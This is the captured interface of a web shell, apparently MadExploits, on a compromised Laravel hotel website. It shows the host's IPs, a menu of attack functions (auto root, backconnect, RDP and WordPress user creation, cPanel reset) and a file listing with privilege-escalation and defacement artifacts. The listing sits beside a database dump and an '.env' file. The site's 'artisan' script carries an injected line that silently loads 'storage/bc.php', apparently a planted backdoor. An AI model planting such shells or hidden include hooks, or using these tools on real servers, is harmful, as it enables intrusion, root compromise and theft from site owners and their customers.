Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
asiatechinc /
public_html /
bhrhotelsindia.com /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-x---
bootstrap
[ DIR ]
drwxr-x---
config
[ DIR ]
drwxr-x---
custom
[ DIR ]
drwxr-x---
database
[ DIR ]
drwxr-x---
lang
[ DIR ]
drwxr-x---
modules
[ DIR ]
drwxr-x---
plugins
[ DIR ]
drwxr-x---
public
[ DIR ]
drwxr-x---
resources
[ DIR ]
drwxr-x---
routes
[ DIR ]
drwxr-x---
storage
[ DIR ]
drwxr-x---
tests
[ DIR ]
drwxr-x---
themes
[ DIR ]
drwxr-x---
vendor
[ DIR ]
drwxr-x---
.babelrc
60
B
-rwxr-x---
.editorconfig
276
B
-rwxr-x---
.env
678
B
-rwxr-x---
.gitattributes
190
B
-rwxr-x---
.gitignore
559
B
-rwxr-x---
.mad-root
0
B
-rw-r--r--
7znew.php
0
B
-rw-r--r--
app.zip
79.43
MB
-rwxr-x---
artisan
1.78
KB
-rwxr-x---
changelog.md
544
B
-rwxr-x---
composer.json
3.46
KB
-rwxr-x---
composer.lock
479.75
KB
-rwxr-x---
cyberyemen.jpg
54.58
KB
-rwxr-x---
error_log
768
B
-rwxr-x---
google76848c33309484f7.html
53
B
-rwxr-x---
gulpfile.js
1.49
KB
-rwxr-x---
license.html
8.86
KB
-rwxr-x---
package-lock.json
374.7
KB
-rwxr-x---
package.json
1.09
KB
-rwxr-x---
phpunit.xml
1.18
KB
-rwxr-x---
pwnkit
0
B
-rwxr-xr-x
readme.md
971
B
-rwxr-x---
root.html
0
B
-rw-r--r--
server.php
584
B
-rwxr-x---
test.php
1.67
KB
-rwxr-x---
txets.php
1
B
-rwxr-x---
vistaarahotel_app.sql
1.76
MB
-rwxr-x---
vite.config.js
274
B
-rwxr-x---
yarn.lock
260.81
KB
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ if(file_exists(__DIR__.'/storage/bc.php')) { require __DIR__.'/storage/bc.php'; } require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close